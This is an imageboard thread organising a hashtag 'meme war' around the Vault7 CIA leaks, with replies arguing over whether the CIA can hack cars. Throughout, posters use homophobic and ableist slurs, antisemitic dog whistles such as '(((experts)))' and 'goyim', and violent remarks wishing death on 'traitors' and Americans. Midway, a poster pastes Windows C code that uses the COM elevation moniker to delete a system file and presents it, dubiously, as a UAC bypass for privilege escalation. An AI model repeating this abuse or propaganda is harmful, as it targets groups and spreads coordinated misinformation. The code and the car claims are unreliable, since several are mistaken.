MEME WAR GENERAL

HAPPENING LEVEL MEMECON 2
HAPPENING
HAPPENING

We NEED to get this going. We have an obligation as the minute men of the Meme War. The MSM is sliding the Vault7 leaks hard, pretending they aren't anything. Hell even the way Women's Day is being used is almost like an MSM slide.

I and others have reviewed a number of the claims made by Wikileaks and we have all been pouring through the documents. We have established three critical Narratives that absolutely must be meme'd into the collective consciousness.

1. The CIA lost control of its cyber-warfare package. Representing a HUGE security risk to US national security interests. The Media is already trying to say Wikileaks is threatening us but it is in fact the CIA itself that lost its arsenal. This is like accidentally losing a nuclear bomb in Afghanistan.

Spread on all platforms with:
#CIAlostthem

2. The CIA is not allowed, by its mandate, to spy on US citizens nor possess a cyber weapons suite of this nature. The CIA broke the law and violated the 4th amendment.

Spread with:
#savethe4th

3. The CIA can hack into and crash vehicles, including cars like Tesla and theoretically airplanes is not impossible either.

Spread with:
#CIAcarAssassins

These narratives are hard to twist around and are resilient though not immune to the usual spin tactics. How can anyone argue that the CIA should be allowed to violate domestic 4th amendment rights? Why is it ok for them to be able to crash our vehicles and not tell us, it makes us unsafe. And most of all: If the CIA lost its asset control then it has been grossly negligent and has put our country at risk.

Lets go. The memewar has not ended.

Other useful tags:

#Vault7
#Wiretapping
#Obamagate

Other urls found in this thread:

youtube.com/watch?v=OSq3Dp2HOaM
wikileaks.org/ciav7p1/#
en.wikipedia.org/wiki/Electronic_throttle_control
twitter.com/NSFWRedditImage

Vault7 was nothing. Even the experts say it was overblown and exaggerated.

Bumping to prevent the slide.

0/10

Shareblue detected already

Welcome new recruits!

Which of you newfags is going to bag the shill in our midst?

bump

Oh no, the cia knows about my shemale fetish and my penchant for swear words.

>already shills
Bump

>let's fight the cia

yea you first fucking homo.

BUMP

I wouldn't expect a LEAF to understand what the 4th amendment protects. But those of us covered in FREEDOM should be angry!

The cia meant to assure the success and safety of the AMERICAN STATE, not the american people. It's like asking people to go stick their dick in the wall outlet. You are the fucking shill. I ain't messing with some black-ops spooks.

By all means have at her.

OP is an idiot. The CIA is here to defend us from criminals and terrorists.

I liked the hashtag from earlier

#NotMyAgency

I'll add it to the next general.

Bump.

Kek speed.

>HURR DURR KILLING TRAITORS IS BAD, TREASON IS OK AS LONG AS IT BENEFITS ME AND STROKES MADE UP BELIEF IN MY SUPERIOR MORALITY.

Fuck wikileaks, cia is based, I hope they kill more traitors.

William S Buroughs Quotes

This.
There is nothing new in these "leaks."

It's probably just a Russian shill tactic.

THIS IS FUCKING GOLD!

>"I am against the deep state because I support american values."
>WTF CIA IS DOING ITS JOB
>YOU SHOULDN'T EXPECT THEM TO OPERATE WITHIN THE LAW AND NOT FUCK EVERYONE OVER
>YOU'RE A SHILL
Are you even trying anymore?
I'll take pity on a poor goy that (((they))) enlisted to fight for their interests, and provide a (You). Enjoy your .01 shekels, and please fuck right off.

Thanks, I made a few earlier

wow now we know ur a shill. u dont even know the joke of Sup Forums.

Nice try CIA

Call this user a bluefag or Based Stickman beats you in the head with a stick tonight.

checked

Yeah, these memes for feminists are pretty good

Also, it's funny how Obama is - depending on the source - either "livid with anger" or "rolling his eyes" about the Shitposter in Chief giving out the bants last weekend.

>almost as if they're covering up for something that they know they're guilty of and are having difficulty getting their story straight

>treason is good as long as it benefits me directly even though it doesn't.
>the government watches me masturbate.

It probably costs minimum 50,000 dolleroos to surveil someone. You really think the government wants to know how gay you are and how much dope you smoke.

I don't think so.

WHEW LAD.

Let the MEMEs flow as the Spice upon Arrakas.

GO TO 6:15

THE WORD IS A VIRUS

THE

WORD

IS

A

VIRUS

MEMES ARE A VIRUS HOYL WSHIT

>hey let's tell all our enemies and the terrorists how we catch them
>freedumbs

lol fucking americans deserve to be killed by the cia.

>The experts say it was nothing

What a good goyim, believing all those (((experts)))

Reporting, sir.

hi cia

>he's more afraid of the cia spying on him than china stealing his weapon prototypes or medical records

wew

I might suggest adding thanks to this post: #1984
And
#theREAL1984

since the media has been making passes at Trump being Hitler and ushering in 1984 revisionism.

Checked

>350k

it's nothing

As far as I know the computer doesn't control the acceleration, breaking system, or steering of a vehicle.

>this is how plebs think cars work.

>(((experts)))

This is the true meme war.

Are any of you retards going to explain this one to me? How does the computer in a car control the steering or acceleration?

Stop sitting on your best memes lads!
We need them for tactical use NOW!

So did the CIA actually lose control of all of these advanced spying tools and they are now in the wild?

No, the americans are just being retarded again. Why would the cia crash someones car instead of just using their heart attack gun?

According to Wikileaks.

wikileaks.org/ciav7p1/#

>Recently, the CIA lost control of the majority of its hacking arsenal including malware, viruses, trojans, weaponized "zero day" exploits, malware remote control systems and associated documentation. This extraordinary collection, which amounts to more than several hundred million lines of code, gives its possessor the entire hacking capacity of the CIA. The archive appears to have been circulated among former U.S. government hackers and contractors in an unauthorized manner, one of whom has provided WikiLeaks with portions of the archive.

I have seen several videos from Fox and a few other stories about how Wikileaks is putting us in harms way by releasing these leaks. Rather than highlighting that the CIA is intentionally leaving open exploits and lost control of their assets.

Yuperooni.

MAGA

Right. Because this code snippet doesn't bypass UAC and give an attacker privilege escalation.

HRESULT CoCreateInstanceAsAdmin(HWND hwnd, REFCLSID rclsid, REFIID riid, void **ppv)
{
BIND_OPTS3 bo;
WCHAR wszCLSID[50];
WCHAR wszMon[300];

StringFromGUID2(rclsid, wszCLSID, sizeof(wszCLSID)/sizeof(wszCLSID[0]));
HRESULT hr = StringCchPrintfW(wszMon, sizeof(wszMon)/sizeof(wszMon[0]), L"Elevation:Administrator!new:%s", wszCLSID);
if (FAILED(hr))
return hr;
memset(&bo, 0, sizeof(bo));
bo.cbStruct = sizeof(bo);
bo.hwnd = hwnd;
bo.dwClassContext = CLSCTX_LOCAL_SERVER;
return CoGetObject(wszMon, &bo, riid, ppv);
}

void ElevatedDelete()
{
MessageBox(NULL, "DELETING", "TESTING", MB_OK);

// This is only availabe on Vista and higher
HRESULT hr = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED | COINIT_DISABLE_OLE1DDE);
IFileOperation *pfo;
hr = CoCreateInstanceAsAdmin(NULL, CLSID_FileOperation, IID_PPV_ARGS(&pfo));
pfo->SetOperationFlags(FOF_NO_UI);
IShellItem *item = NULL;
hr = SHCreateItemFromParsingName(L"C:\\WINDOWS\\TEST.DLL", NULL, IID_PPV_ARGS(&item));
pfo->DeleteItem(item, NULL);
pfo->PerformOperations();
item->Release();
pfo->Release();
CoUninitialize();
}

>he's a leaf

>Americans are just being retarded again

Reminder you're nation wouldn't exist if we weren't defending this continent.

just stop posting tudeau

Did you fucking retards just realize this? Non retards have known about this since the 90's.

>car computers can explode and crash your car with the ebul cia virus
>says the mechanically retarded idiot who doesn't drive or work on cars.

#NotMyAgency is a great hashtag because it factors in liberals as well.

You need to start a list of CIA approved products. A seal with a smiling family and a spook giving a thumbs up with his giant headphones on or something similar.

fpwp

>Even the experts say it was overblown and exaggerated.

kind of like your mom's fake tits

Bump we must win.
Shit just got real.

Spice

Lol lame ass shill detected

checked

>non-retards have known about wi-fi and smart devices since the nineties.
Swing and a miss, faggot, but thanks for giving me a chance to post more memes.

>The CIA is here to defend us from criminals and terrorists.

they do make sure ghetto drug dealers have plenty of drugs to be arrested for

Trump2020

>cars are magic and controlled by computers
>computers in cars control sensors, there is no way to shut off the steering wheel or breaks on a car because they are controlled by hydraulics and not electronics, even if the system fails you can still steer and use your emergency break.

Seriously, drop the car meme, it makes you look literally retarded.

wait did they release actual code in the leaks?

FOR GLORY

>digits.

THE WORD IS A VIRUS

THE WORD IS A VIRUS

THE WORD IS A VIRUS

WATCH THE VID

Say that to these abs you fuck

through electric impulses
steering only possible with self driving capable cars
acceleration on the other hand..
en.wikipedia.org/wiki/Electronic_throttle_control
>the vast majority of drivers have no idea how much intervention is happening
you are the pleb

These abs

What is the "word" though?

Did I say anything about wifi or smart devices. I said that we have known the cia has been monitoring us since the 90's. This isn't news unless you are 15.

>he thinks cars are controlled by electronics and not hydraulics

still waiting for an explination on this.

We cannot lose hope

Just give it up Shareblue, all you're doing is keeping this thread alive.

Meme Magic....

he was a fucking prophit

>vehicle control systems can't control speed or steering
>undetectable assassinations

>Experts

damn, i replied to the obvious shill...
time to sleep

Bump n pump!

You are dumb, the steering is controlled by "power steering" A electric motor pumps hydraulic fluid, there is no way to affect the steering, if the hydraulics fail, the car becomes hard to steer, you can't lose control unless you are a fucking retard.

There is no computation involved here, you can't crash a car by giving it a virus. You are down syndrome as fuck.

>I have no idea how hydraulics work the post

>Cars are controlled by hydraulics not electronics
Not like the electronics control the hydraulics or anything like that you mechanical illiterate

i even said controlling steering isn't really possible
but acceleration is, fucking monkey

Don't give the shill your precious (You)'s.
(You)'s give them shekels.

If he isn't a shill he's either a fucking retard or an obvious troll. There is no point in discussing anything.

Here, then, (You) can have it instead.

Explain to me how a virus can crash a car.

This is how it works retard, your steering wheel is connected to a chain that is connected to a pump, there is no computer involved unless you consider a chain attached to an electric motor a computer.

;^)
>oc made it into the meme museum

THIS

which makes it obligatory to listen to...